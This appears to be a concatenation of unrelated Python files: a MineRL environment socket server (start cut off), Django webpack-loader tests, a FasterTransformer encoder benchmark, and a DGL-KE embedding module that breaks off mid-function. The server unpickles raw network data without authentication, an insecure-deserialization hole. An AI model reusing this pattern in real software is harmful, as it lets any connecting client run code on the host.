else:
send_data(connection, Exception("invalid type"))
logging.error(Exception("Invalid type"))
else:
try:
send_data(connection, Exception("invalid message"))
except Exception:
break
finally:
self.handler.release_env(self.handler.env_register, client_address)
def receive_data(connection):
raw_msglen = recvall(connection, 4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
# Read the message data
message = recvall(connection, msglen)
decoded_input = pickle.loads(message, encoding="bytes")
return decoded_input
def recvall(sock, n):
# Helper function to recv n bytes or return None if EOF is hit
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
def send_data(connection, data):
message = pickle.dumps(data, protocol=4)
message = struct.pack('>I', len(message)) + message
connection.sendall(message)
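# Illustrative client-side sketch (an assumption, not part of the original
# file): the server expects pickled dicts of the form
# {"type": <handler name>, "data": <payload>}, framed exactly as in
# send_data/receive_data (4-byte big-endian length prefix + pickle payload):
#
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect(("127.0.0.1", 9999))
#   send_data(client, {"type": "version", "data": None})  # ask for the env name
#   print(receive_data(client))                           # e.g. "MineRLTreechop-v0"
#   send_data(client, {"type": "close", "data": None})    # release any reserved env
#   client.close()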
def gym_sync_create(env_string, thread_id):
lock_dir = os.path.join(tempfile.gettempdir(), getpass.getuser())
if not os.path.exists(lock_dir):
os.makedirs(lock_dir)
with open(os.path.join(lock_dir, "minecraft-{}.lock".format(thread_id)), "wb") as lock_file:
fcntl.flock(lock_file.fileno(), fcntl.LOCK_EX)
try:
env = gym.make(env_string)
return env
finally:
fcntl.flock(lock_file.fileno(), fcntl.LOCK_UN)
class Handler:
def __init__(self, env_name: str = "MineRLTreechop-v0", num_envs: int = 1):
self.message_dict = {
"make": self.handle_make,
"step": self.handle_step,
"reset": self.handle_reset,
"close": self.handle_close,
"version": self.handle_version
}
self.env_name = env_name
self.num_envs = num_envs
self.env_pool = None
self.env_register = None
def handle_version(self, client, data):
return self.env_name
def handle_make(self, client, data):
logging.info("Make %s" % data)
if data == self.env_name:
try:
self.reserve_env(self.env_pool, self.env_register, client)
logging.info("Success")
return True
except:
logging.error("Failed - Exception in reserve_env")
return False
else:
logging.error("Failed - Environment ID mismatch: {}".format(self.env_name))
return False
def handle_close(self, client, data):
logging.info("Close")
self.release_env(self.env_register, client)
return True
def handle_step(self, client, data):
env = self.env_pool[self.env_register[client]]
try:
return env.step(data)
except Exception as e:
try:
logging.error("EXCEPTION DURING env.step, resetting...\n{}".format(e))
env.reset()
return self.handle_step(client, data)
except Exception as e:
# assume broken env
logging.error("EXCEPTION DURING env.step.reset, restarting_env...\n{}".format(e))
self.restart_env(self.env_register[client])
return self.handle_step(client, data)
def handle_reset(self, client, data):
logging.info("Reset: %s, %s" % (client, data))
env = self.env_pool[self.env_register[client]]
seed = data["seed"] if "seed" in data else None
if seed is not None:
env.seed(data["seed"])
try:
return env.reset()
except Exception as e:
# assume broken env
logging.error("EXCEPTION DURING env.reset, restarting_env...\n{}".format(e))
return self.restart_env(self.env_register[client], seed=seed)
@staticmethod
def _make_env(env_name):
logging.info("Initializing %s" % env_name)
env = gym_sync_create(env_name)
env.reset()
return env
def restart_env(self, env_id, seed=None):
try:
env = self.env_pool[env_id]
env.close()
except:
pass
env = gym.make(self.env_name)
self.env_pool[env_id] = env
if seed is not None:
env.seed(seed)
return env.reset()
def startup_pool(self):
# startup env pool
logging.info("Starting up environment pool (%d): %s" % (self.num_envs, self.env_name))
# p = Pool(self.num_envs)
# envs = p.map(self._make_env, [self.env_name for i in range(self.num_envs)])
# env_pool = {i: envs[i] for i in range(self.num_envs)}
env_pool = {i: gym.make(self.env_name) for i in range(self.num_envs)}
env_register = {}
for env_id, env in env_pool.items():
logging.info("Resetting env...")
env.reset()
logging.info("Done")
logging.info("Ready!")
self.env_pool = env_pool
self.env_register = env_register
def reserve_env(self, pool, register, address):
self.release_env(register, address)
for env_id, env in pool.items():
if env_id not in register.values():
register[address] = env_id
logging.info("Reserved environment %d for %s" % (env_id, address))
return
raise Exception("Out of Environments!")
@staticmethod
def release_env(register, address):
if address in register:
env_id = register.pop(address)
logging.info("Released env %d used by %s" % (env_id, address))
def parse_args():
parser = argparse.ArgumentParser(description='Start environment server.')
parser.add_argument("--env", choices=["MineRLTreechop-v0", "MineRLObtainDiamond-v0", "MineRLObtainDiamondDense-v0"],
help="Environment name")
parser.add_argument("--port", type=int, default=9999, help="server port")
parser.add_argument("--poolsize", type=int, default=1, help="number of environments to keep")
return parser.parse_args()
def start(args):
handler = Handler(env_name=args.env, num_envs=args.poolsize)
handler.startup_pool()
server = EnvServer(handler=handler, port=args.port)
server.start_server()
server.listen()
if __name__ == "__main__":
args = parse_args()
start(args)
|
test_webpack.py
|
import json
import os
import time
from subprocess import call
from threading import Thread
import django
from django.conf import settings
from django.test import RequestFactory, TestCase
from django.views.generic.base import TemplateView
from django_jinja.builtins import DEFAULT_EXTENSIONS
from unittest2 import skipIf
from webpack_loader.exceptions import (
WebpackError,
WebpackLoaderBadStatsError,
WebpackLoaderTimeoutError,
WebpackBundleLookupError
)
from webpack_loader.utils import get_loader
BUNDLE_PATH = os.path.join(settings.BASE_DIR, 'assets/bundles/')
DEFAULT_CONFIG = 'DEFAULT'
class LoaderTestCase(TestCase):
def setUp(self):
self.factory = RequestFactory()
def compile_bundles(self, config, wait=None):
if wait:
time.sleep(wait)
call(['./node_modules/.bin/webpack', '--config', config])
@skipIf(django.VERSION < (1, 7),
'not supported in this django version')
def test_config_check(self):
from webpack_loader.apps import webpack_cfg_check
from webpack_loader.errors import BAD_CONFIG_ERROR
with self.settings(WEBPACK_LOADER={
'BUNDLE_DIR_NAME': 'bundles/',
'STATS_FILE': 'webpack-stats.json',
}):
errors = webpack_cfg_check(None)
expected_errors = [BAD_CONFIG_ERROR]
self.assertEqual(errors, expected_errors)
with self.settings(WEBPACK_LOADER={
'DEFAULT': {}
}):
errors = webpack_cfg_check(None)
expected_errors = []
self.assertEqual(errors, expected_errors)
def test_simple_and_css_extract(self):
self.compile_bundles('webpack.config.simple.js')
assets = get_loader(DEFAULT_CONFIG).get_assets()
self.assertEqual(assets['status'], 'done')
self.assertIn('chunks', assets)
chunks = assets['chunks']
self.assertIn('main', chunks)
self.assertEqual(len(chunks), 1)
main = chunks['main']
self.assertEqual(main[0]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/main.js'))
self.assertEqual(main[1]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/styles.css'))
def test_js_gzip_extract(self):
self.compile_bundles('webpack.config.gzipTest.js')
assets = get_loader(DEFAULT_CONFIG).get_assets()
self.assertEqual(assets['status'], 'done')
self.assertIn('chunks', assets)
chunks = assets['chunks']
self.assertIn('main', chunks)
self.assertEqual(len(chunks), 1)
main = chunks['main']
self.assertEqual(main[0]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/main.js.gz'))
self.assertEqual(main[1]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/styles.css'))
def test_static_url(self):
self.compile_bundles('webpack.config.publicPath.js')
assets = get_loader(DEFAULT_CONFIG).get_assets()
self.assertEqual(assets['status'], 'done')
self.assertEqual(assets['publicPath'], 'http://custom-static-host.com/')
def test_code_spliting(self):
self.compile_bundles('webpack.config.split.js')
assets = get_loader(DEFAULT_CONFIG).get_assets()
self.assertEqual(assets['status'], 'done')
self.assertIn('chunks', assets)
chunks = assets['chunks']
self.assertIn('main', chunks)
self.assertEqual(len(chunks), 2)
main = chunks['main']
self.assertEqual(main[0]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/main.js'))
vendor = chunks['vendor']
self.assertEqual(vendor[0]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/vendor.js'))
def test_templatetags(self):
self.compile_bundles('webpack.config.simple.js')
self.compile_bundles('webpack.config.app2.js')
view = TemplateView.as_view(template_name='home.html')
request = self.factory.get('/')
result = view(request)
self.assertIn('<link type="text/css" href="/static/bundles/styles.css" rel="stylesheet" />', result.rendered_content)
self.assertIn('<script type="text/javascript" src="/static/bundles/main.js" async charset="UTF-8"></script>', result.rendered_content)
self.assertIn('<link type="text/css" href="/static/bundles/styles-app2.css" rel="stylesheet" />', result.rendered_content)
self.assertIn('<script type="text/javascript" src="/static/bundles/app2.js" ></script>', result.rendered_content)
self.assertIn('<img src="/static/my-image.png"/>', result.rendered_content)
view = TemplateView.as_view(template_name='only_files.html')
result = view(request)
self.assertIn("var contentCss = '/static/bundles/styles.css'", result.rendered_content)
self.assertIn("var contentJS = '/static/bundles/main.js'", result.rendered_content)
self.compile_bundles('webpack.config.publicPath.js')
view = TemplateView.as_view(template_name='home.html')
request = self.factory.get('/')
result = view(request)
self.assertIn('<img src="http://custom-static-host.com/my-image.png"/>', result.rendered_content)
def test_jinja2(self):
self.compile_bundles('webpack.config.simple.js')
self.compile_bundles('webpack.config.app2.js')
view = TemplateView.as_view(template_name='home.jinja')
if django.VERSION >= (1, 8):
settings = {
'TEMPLATES': [
{
"BACKEND": "django_jinja.backend.Jinja2",
"APP_DIRS": True,
"OPTIONS": {
"match_extension": ".jinja",
"extensions": DEFAULT_EXTENSIONS + [
"webpack_loader.contrib.jinja2ext.WebpackExtension",
]
}
},
]
}
else:
settings = {
'TEMPLATE_LOADERS': (
'django_jinja.loaders.FileSystemLoader',
'django_jinja.loaders.AppLoader',
),
}
with self.settings(**settings):
request = self.factory.get('/')
result = view(request)
self.assertIn('<link type="text/css" href="/static/bundles/styles.css" rel="stylesheet" />', result.rendered_content)
self.assertIn('<script type="text/javascript" src="/static/bundles/main.js" async charset="UTF-8"></script>', result.rendered_content)
def test_reporting_errors(self):
self.compile_bundles('webpack.config.error.js')
try:
get_loader(DEFAULT_CONFIG).get_bundle('main')
except WebpackError as e:
self.assertIn("Cannot resolve module 'the-library-that-did-not-exist'", str(e))
def test_missing_bundle(self):
missing_bundle_name = 'missing_bundle'
self.compile_bundles('webpack.config.simple.js')
try:
get_loader(DEFAULT_CONFIG).get_bundle(missing_bundle_name)
except WebpackBundleLookupError as e:
self.assertIn('Cannot resolve bundle {0}'.format(missing_bundle_name), str(e))
def test_missing_stats_file(self):
stats_file = settings.WEBPACK_LOADER[DEFAULT_CONFIG]['STATS_FILE']
if os.path.exists(stats_file):
os.remove(stats_file)
try:
get_loader(DEFAULT_CONFIG).get_assets()
except IOError as e:
expected = (
'Error reading {0}. Are you sure webpack has generated the '
'file and the path is correct?'
).format(stats_file)
self.assertIn(expected, str(e))
def test_timeouts(self):
with self.settings(DEBUG=True):
with open(
settings.WEBPACK_LOADER[DEFAULT_CONFIG]['STATS_FILE'], 'w'
) as stats_file:
stats_file.write(json.dumps({'status': 'compiling'}))
loader = get_loader(DEFAULT_CONFIG)
loader.config['TIMEOUT'] = 0.1
with self.assertRaises(WebpackLoaderTimeoutError):
loader.get_bundle('main')
def test_bad_status_in_production(self):
with open(
settings.WEBPACK_LOADER[DEFAULT_CONFIG]['STATS_FILE'], 'w'
) as stats_file:
stats_file.write(json.dumps({'status': 'unexpected-status'}))
try:
get_loader(DEFAULT_CONFIG).get_bundle('main')
except WebpackLoaderBadStatsError as e:
self.assertIn((
"The stats file does not contain valid data. Make sure "
"webpack-bundle-tracker plugin is enabled and try to run"
" webpack again."
), str(e))
def test_request_blocking(self):
# FIXME: This will work 99% of the time but there is no guarantee with the
# 4 second thing. Need a better way to detect whether the request was blocked
# or not.
wait_for = 3
view = TemplateView.as_view(template_name='home.html')
with self.settings(DEBUG=True):
open(settings.WEBPACK_LOADER[DEFAULT_CONFIG]['STATS_FILE'], 'w').write(json.dumps({'status': 'compiling'}))
then = time.time()
request = self.factory.get('/')
result = view(request)
t = Thread(target=self.compile_bundles, args=('webpack.config.simple.js', wait_for))
t2 = Thread(target=self.compile_bundles, args=('webpack.config.app2.js', wait_for))
t.start()
t2.start()
result.rendered_content
elapsed = time.time() - then
t.join()
t2.join()
self.assertTrue(elapsed > wait_for)
with self.settings(DEBUG=False):
self.compile_bundles('webpack.config.simple.js')
self.compile_bundles('webpack.config.app2.js')
then = time.time()
request = self.factory.get('/')
result = view(request)
result.rendered_content
elapsed = time.time() - then
self.assertTrue(elapsed < wait_for)
|
encoder_sample.py
|
# Copyright (c) 2019-2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
This sample demonstrates how to use the TensorFlow custom op with the
FasterTransformer library for the encoder.
It builds a BERT transformer model with both TensorFlow and the TensorFlow
custom op, then compares their maximum difference to verify the correctness
of FasterTransformer.
Users can also use this sample to measure the average forward time of
TensorFlow and FasterTransformer.
'''
import copy
import tensorflow as tf
import numpy as np
import argparse
import time
from utils.common import TransformerArgument
from utils.common import time_test
from utils.common import cross_check
from utils.encoder import tf_encoder
from utils.encoder import op_encoder
from utils.encoder import build_sequence_mask
import threading
def encoder_sample(args_dict):
print("\n=============== Argument ===============")
for key in args_dict:
print("{}: {}".format(key, args_dict[key]))
print("========================================")
np.random.seed(1)
tf.set_random_seed(1)
batch_size = args_dict['batch_size']
num_layer = args_dict['num_layer']
max_seq_len = args_dict['max_seq_len']
avg_seq_len = args_dict['avg_seq_len']
head_num = args_dict['head_number']
size_per_head = args_dict['size_per_head']
tf_datatype = tf.float32
np_datatype = np.float32
atol_threshold = 3e-5
int8_mode = args_dict['int8_mode']
allow_gemm_test = True if args_dict['allow_gemm_test'].lower() == "true" else False
if args_dict['data_type'] == "fp16":
tf_datatype = tf.float16
np_datatype = np.float16
atol_threshold = 3e-2
hidden_dim = head_num * size_per_head
sequence_length = np.random.randint(1, max_seq_len + 1, size=batch_size)
if avg_seq_len != -1:
# This means we use "remove_padding" and set the given average sequence length
sequence_length = np.ones(batch_size) * avg_seq_len
else:
sequence_length = np.ones(batch_size) * (max_seq_len / 2)
sequence_length = sequence_length.astype(np.int32)
from_data = np.random.randn(batch_size, max_seq_len, hidden_dim)
from_tensor = tf.convert_to_tensor(from_data, dtype=tf_datatype)
attention_mask = build_sequence_mask(sequence_length, num_heads=head_num, maximum_length=max_seq_len, dtype=tf_datatype)
encoder_args = TransformerArgument(beam_width=1,
head_num=head_num,
size_per_head=size_per_head,
num_layer=num_layer,
dtype=tf_datatype,
remove_padding=False,
int8_mode=int8_mode,
allow_gemm_test=allow_gemm_test)
eff_encoder_args = copy.deepcopy(encoder_args)
eff_encoder_args.remove_padding = True
tf_encoder_result = tf_encoder(input_tensor=from_tensor,
encoder_args=encoder_args,
attention_mask=attention_mask)
encoder_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
encoder_variables_dict = {}
for v in encoder_vars:
encoder_variables_dict[v.name] = v
op_encoder_result = op_encoder(inputs=from_tensor,
encoder_args=encoder_args,
attention_mask=attention_mask,
encoder_vars_dict=encoder_variables_dict,
sequence_length=sequence_length)
eff_encoder_result = op_encoder(inputs=from_tensor,
encoder_args=eff_encoder_args,
attention_mask=attention_mask,
encoder_vars_dict=encoder_variables_dict,
sequence_length=sequence_length)
'''
Because FasterTransformer skips some computation for the padding parts,
the cross-check result would be wrong if we did not mask these parts.
'''
tf_encoder_result = tf_encoder_result * tf.expand_dims(tf.sequence_mask(sequence_length, maxlen=max_seq_len, dtype=tf_datatype), axis=-1)
op_encoder_result = op_encoder_result * tf.expand_dims(tf.sequence_mask(sequence_length, maxlen=max_seq_len, dtype=tf_datatype), axis=-1)
eff_encoder_result = eff_encoder_result * tf.expand_dims(tf.sequence_mask(sequence_length, maxlen=max_seq_len, dtype=tf_datatype), axis=-1)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1
with tf.Session(config=config) as sess:
sess.run(tf.global_variables_initializer())
for idx, name in enumerate(encoder_variables_dict):
print((str(idx) + " " + str(name) + " " +
str(encoder_variables_dict[name].shape)) + " " + str(encoder_variables_dict[name].dtype))
print("#################################")
tf_encoder_result_val = sess.run(tf_encoder_result)
op_encoder_result_val = sess.run(op_encoder_result)
eff_encoder_result_val = sess.run(eff_encoder_result)
cross_check("Encoder TF v.s. FT with tensor input", tf_encoder_result_val, op_encoder_result_val, atol_threshold)
cross_check("Encoder TF v.s. EFF-FT with tensor input", tf_encoder_result_val, eff_encoder_result_val, atol_threshold)
op_diff = abs(tf_encoder_result_val.reshape([-1]) - op_encoder_result_val.reshape([-1]))
eff_diff = abs(tf_encoder_result_val.reshape([-1]) - eff_encoder_result_val.reshape([-1]))
max_diff = max(op_diff.max(), eff_diff.max())
ite = 50
def _cond(from_tensor):
return tf.constant(True)
def _ft_body(from_tensor):
op_encoder_result = op_encoder(inputs=from_tensor,
encoder_args=encoder_args,
attention_mask=attention_mask,
encoder_vars_dict=encoder_variables_dict,
sequence_length=sequence_length)
return op_encoder_result
def _eff_body(from_tensor):
eff_encoder_result = op_encoder(inputs=from_tensor,
encoder_args=eff_encoder_args,
attention_mask=attention_mask,
encoder_vars_dict=encoder_variables_dict,
sequence_length=sequence_length)
return eff_encoder_result
def _tf_body(from_tensor):
tf_encoder_result = tf_encoder(input_tensor=from_tensor,
encoder_args=encoder_args,
attention_mask=attention_mask)
return tf_encoder_result
tf_while_tensor = tf.while_loop(_cond,
_tf_body,
loop_vars=[from_tensor],
back_prop=False,
maximum_iterations=ite)
ft_while_tensor = tf.while_loop(_cond,
_ft_body,
loop_vars=[from_tensor],
back_prop=False,
maximum_iterations=ite)
eff_while_tensor = tf.while_loop(_cond,
_eff_body,
loop_vars=[from_tensor],
back_prop=False,
maximum_iterations=ite)
if args_dict['test_time'] == 1:
# tf_time = time_test(sess, tf_encoder_result, ite)
# ft_time = time_test(sess, op_encoder_result, ite)
# eff_time = time_test(sess, eff_encoder_result, ite)
# Use a while_loop to run 'ite' iterations so that the overheads of memory
# copies and model preprocessing are excluded. These timings are used as the
# profiling results.
tf_while_time = time_test(sess, tf_while_tensor, 1) / ite # while_loop has run ite times
time.sleep(60)
ft_while_time = time_test(sess, ft_while_tensor, 1) / ite # while_loop has run ite times
time.sleep(60)
eff_while_time = time_test(sess, eff_while_tensor, 1) / ite # while_loop has run ite times
time.sleep(60)
ft_type = args_dict['data_type'].upper()
if int8_mode != 0:
ft_type = "INT8-v{}".format(int8_mode)
# print("[INFO] batch_size {} max_seq_len {} precision {} {} layer TF-time {:6.2f} ms".format(batch_size, max_seq_len, args_dict['data_type'].upper(), num_layer, tf_time))
# print("[INFO] batch_size {} max_seq_len {} precision {} {} layer FT-OP-time {:6.2f} ms".format(batch_size, max_seq_len, ft_type, num_layer, ft_time))
# print("[INFO] batch_size {} max_seq_len {} precision {} {} layer EFF-OP-time {:6.2f} ms".format(batch_size, max_seq_len, ft_type, num_layer, eff_time))
print("[INFO] batch_size {} max_seq_len {} precision {} {} layer TF-while-time {:6.2f} ms ( {} iterations)".format(batch_size, max_seq_len, args_dict['data_type'].upper(), num_layer, tf_while_time, ite))
print("[INFO] batch_size {} max_seq_len {} precision {} {} layer FT-OP-while-time {:6.2f} ms ( {} iterations)".format(batch_size, max_seq_len, ft_type, num_layer, ft_while_time, ite))
print("[INFO] batch_size {} max_seq_len {} precision {} {} layer EFF-OP-while-time {:6.2f} ms ( {} iterations)".format(batch_size, max_seq_len, ft_type, num_layer, eff_while_time, ite))
if args_dict['thread_num'] > 1:
# Multi-threading demonstration
thread_list = []
thread_num = args_dict['thread_num']
def run():
ft_while_time = time_test(sess, ft_while_tensor, 1) / ite # while_loop has run ite times
print("[INFO] batch_size {} max_seq_len {} {} layer FT-OP-while-time {:6.2f} ms with {} threads".format(batch_size,
max_seq_len, num_layer, ft_while_time, thread_num))
for i in range(thread_num):
thread_list.append(threading.Thread(target=run, name="RunFT"))
for t in thread_list:
t.start()
for t in thread_list:
t.join()
return max_diff
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-batch', '--batch_size', type=int, default=4, metavar='NUMBER',
help='batch size (default: 4)')
parser.add_argument('-l', '--num_layer', type=int, default=12, metavar='NUMBER',
help='number of layers (default: 12)')
parser.add_argument('-s', '--max_seq_len', type=int, default=32, metavar='NUMBER',
help='max sequence length (default: 32)')
parser.add_argument('-n', '--head_number', type=int, default=12, metavar='NUMBER',
help='head number (default: 12)')
parser.add_argument('-size', '--size_per_head', type=int, default=64, metavar='NUMBER',
help='size per head (default: 64)')
parser.add_argument('-d', '--data_type', type=str, default="fp32", metavar='STRING',
help='data type (default: fp32)', choices=['fp32', 'fp16'])
parser.add_argument('-int8_mode', '--int8_mode', type=int, default=0, metavar='NUMBER',
help='int8 mode (default: 0)', choices=[0, 1, 2])
parser.add_argument('-allow_gemm_test', '--allow_gemm_test', type=str, default="False", metavar='BOOL',
help='whether allow gemm test inside FT (default: False)', choices=["True", "False"])
parser.add_argument('-time', '--test_time', type=int, default=0, metavar='BOOL',
help='test the time or not. (default: False (0)), True is 1.',
choices=[0, 1])
parser.add_argument('-avg_seq', '--avg_seq_len', type=int, default=-1, metavar='NUMBER',
help='average sequence length (default: -1)')
parser.add_argument('-thread_num', '--thread_num', type=int, default=1, metavar='int',
help='Testing multithread if thread_num > 1.')
args = parser.parse_args()
encoder_sample(vars(args))
|
tensor_models.py
|
# -*- coding: utf-8 -*-
#
# tensor_models.py
#
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
KG Sparse embedding
"""
import os
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as functional
import torch.nn.init as INIT
import torch.multiprocessing as mp
from torch.multiprocessing import Queue
from _thread import start_new_thread
import traceback
from functools import wraps
from .. import *
logsigmoid = functional.logsigmoid
def get_dev(gpu):
return th.device('cpu') if gpu < 0 else th.device('cuda:' + str(gpu))
def get_device(args):
return th.device('cpu') if args.gpu[0] < 0 else th.device('cuda:' + str(args.gpu[0]))
none = lambda x : x
norm = lambda x, p: x.norm(p=p)**p
get_scalar = lambda x: x.detach().item()
reshape = lambda arr, x, y: arr.view(x, y)
cuda = lambda arr, gpu: arr.cuda(gpu)
def l2_dist(x, y, pw=False):
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return -th.norm(x-y, p=2, dim=-1)
def l1_dist(x, y, pw=False):
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return -th.norm(x-y, p=1, dim=-1)
def dot_dist(x, y, pw=False):
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return th.sum(x * y, dim=-1)
def cosine_dist(x, y, pw=False):
score = dot_dist(x, y, pw)
x = x.norm(p=2, dim=-1)
y = y.norm(p=2, dim=-1)
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return score / (x * y)
def extended_jaccard_dist(x, y, pw=False):
score = dot_dist(x, y, pw)
x = x.norm(p=2, dim=-1)**2
y = y.norm(p=2, dim=-1)**2
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return score / (x + y - score)
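# Note on the `pw` flag used by the distance functions above (a clarifying
# comment, not part of the original docstrings): with pw=False, x of shape
# [n, d] and y of shape [m, d] are broadcast via unsqueeze(1)/unsqueeze(0)
# into an [n, m] score matrix; with pw=True, x and y are scored element-wise
# along the last dimension.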
def thread_wrapped_func(func):
"""Wrapped func for torch.multiprocessing.Process.
    With this wrapper we can use OMP threads in subprocesses;
    otherwise OMP_NUM_THREADS=1 is mandatory.
How to use:
@thread_wrapped_func
def func_to_wrap(args ...):
"""
@wraps(func)
def decorated_function(*args, **kwargs):
queue = Queue()
def _queue_result():
exception, trace, res = None, None, None
try:
res = func(*args, **kwargs)
except Exception as e:
exception = e
trace = traceback.format_exc()
queue.put((res, exception, trace))
start_new_thread(_queue_result, ())
result, exception, trace = queue.get()
if exception is None:
return result
else:
assert isinstance(exception, Exception)
raise exception.__class__(trace)
return decorated_function
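# A minimal usage sketch of the decorator above (the worker function and its
# arguments are hypothetical, shown only to illustrate how a wrapped function
# is launched through torch.multiprocessing):
#
#   @thread_wrapped_func
#   def worker(rank, emb):
#       ...  # OMP-heavy work here
#
#   proc = mp.Process(target=worker, args=(0, emb))
#   proc.start()
#   proc.join()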
@thread_wrapped_func
def async_update(args, emb, queue):
"""Asynchronous embedding update for entity embeddings.
How it works:
    1. The trainer process pushes entity embedding update requests into the queue.
    2. The async_update process pulls requests from the queue, computes the
       gradient state and the update, and writes them into the entity embeddings.
Parameters
----------
args :
        Global configs.
emb : ExternalEmbedding
The entity embeddings.
queue:
The request queue.
"""
th.set_num_threads(args.num_thread)
while True:
(grad_indices, grad_values, gpu_id) = queue.get()
clr = emb.args.lr
if grad_indices is None:
return
with th.no_grad():
grad_sum = (grad_values * grad_values).mean(1)
device = emb.state_sum.device
if device != grad_indices.device:
grad_indices = grad_indices.to(device)
if device != grad_sum.device:
grad_sum = grad_sum.to(device)
emb.state_sum.index_add_(0, grad_indices, grad_sum)
std = emb.state_sum[grad_indices] # _sparse_mask
if gpu_id >= 0:
std = std.cuda(gpu_id)
std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
tmp = (-clr * grad_values / std_values)
if tmp.device != device:
tmp = tmp.to(device)
emb.emb.index_add_(0, grad_indices, tmp)
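# Producer-side sketch of the protocol handled above (see create_async_update /
# finish_async_update further down in this file): the trainer pushes
# (grad_indices, grad_values, gpu_id) tuples into the queue, and a
# (None, None, None) sentinel stops the worker. Illustrative only:
#
#   emb.create_async_update()           # spawns async_update in a subprocess
#   emb.async_q.put((idx, grad, -1))    # normally done inside ExternalEmbedding.update()
#   emb.finish_async_update()           # sends the (None, None, None) sentinel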
class InferEmbedding:
def __init__(self, device):
self.device = device
def load(self, path, name):
"""Load embeddings.
Parameters
----------
path : str
Directory to load the embedding.
name : str
Embedding name.
"""
file_name = os.path.join(path, name+'.npy')
self.emb = th.Tensor(np.load(file_name))
def __call__(self, idx):
return self.emb[idx].to(self.device)
class ExternalEmbedding:
"""Sparse Embedding for Knowledge Graph
It is used to store both entity embeddings and relation embeddings.
Parameters
----------
args :
Global configs.
num : int
Number of embeddings.
dim : int
        Embedding dimension size.
device : th.device
Device to store the embedding.
"""
def __init__(self, args, num, dim, device):
self.gpu = args.gpu
self.args = args
self.num = num
self.trace = []
self.emb = th.empty(num, dim, dtype=th.float32, device=device)
self.state_sum = self.emb.new().resize_(self.emb.size(0)).zero_()
self.state_step = 0
self.has_cross_rel = False
# queue used by asynchronous update
self.async_q = None
# asynchronous update process
self.async_p = None
def init(self, emb_init):
"""Initializing the embeddings.
Parameters
----------
emb_init : float
            The initial embedding range should be [-emb_init, emb_init].
"""
INIT.uniform_(self.emb, -emb_init, emb_init)
INIT.zeros_(self.state_sum)
def setup_cross_rels(self, cross_rels, global_emb):
cpu_bitmap = th.zeros((self.num,), dtype=th.bool)
for i, rel in enumerate(cross_rels):
cpu_bitmap[rel] = 1
self.cpu_bitmap = cpu_bitmap
self.has_cross_rel = True
self.global_emb = global_emb
def get_noncross_idx(self, idx):
cpu_mask = self.cpu_bitmap[idx]
gpu_mask = ~cpu_mask
return idx[gpu_mask]
def share_memory(self):
"""Use torch.tensor.share_memory_() to allow cross process tensor access
"""
self.emb.share_memory_()
self.state_sum.share_memory_()
def __call__(self, idx, gpu_id=-1, trace=True):
""" Return sliced tensor.
Parameters
----------
idx : th.tensor
Slicing index
gpu_id : int
Which gpu to put sliced data in.
trace : bool
If True, trace the computation. This is required in training.
If False, do not trace the computation.
Default: True
"""
if self.has_cross_rel:
cpu_idx = idx.cpu()
cpu_mask = self.cpu_bitmap[cpu_idx]
cpu_idx = cpu_idx[cpu_mask]
cpu_idx = th.unique(cpu_idx)
if cpu_idx.shape[0] != 0:
cpu_emb = self.global_emb.emb[cpu_idx]
self.emb[cpu_idx] = cpu_emb.cuda(gpu_id)
s = self.emb[idx]
if gpu_id >= 0:
s = s.cuda(gpu_id)
# During the training, we need to trace the computation.
# In this case, we need to record the computation path and compute the gradients.
if trace:
data = s.clone().detach().requires_grad_(True)
self.trace.append((idx, data))
else:
data = s
return data
def update(self, gpu_id=-1):
""" Update embeddings in a sparse manner
        Sparse embeddings are updated in mini-batches. We maintain a gradient state for
        each embedding so they can be updated separately.
Parameters
----------
gpu_id : int
Which gpu to accelerate the calculation. if -1 is provided, cpu is used.
"""
self.state_step += 1
with th.no_grad():
for idx, data in self.trace:
grad = data.grad.data
clr = self.args.lr
#clr = self.args.lr / (1 + (self.state_step - 1) * group['lr_decay'])
# the update is non-linear so indices must be unique
grad_indices = idx
grad_values = grad
if self.async_q is not None:
grad_indices.share_memory_()
grad_values.share_memory_()
self.async_q.put((grad_indices, grad_values, gpu_id))
else:
grad_sum = (grad_values * grad_values).mean(1)
device = self.state_sum.device
if device != grad_indices.device:
grad_indices = grad_indices.to(device)
if device != grad_sum.device:
grad_sum = grad_sum.to(device)
if self.has_cross_rel:
cpu_mask = self.cpu_bitmap[grad_indices]
cpu_idx = grad_indices[cpu_mask]
if cpu_idx.shape[0] > 0:
cpu_grad = grad_values[cpu_mask]
cpu_sum = grad_sum[cpu_mask].cpu()
cpu_idx = cpu_idx.cpu()
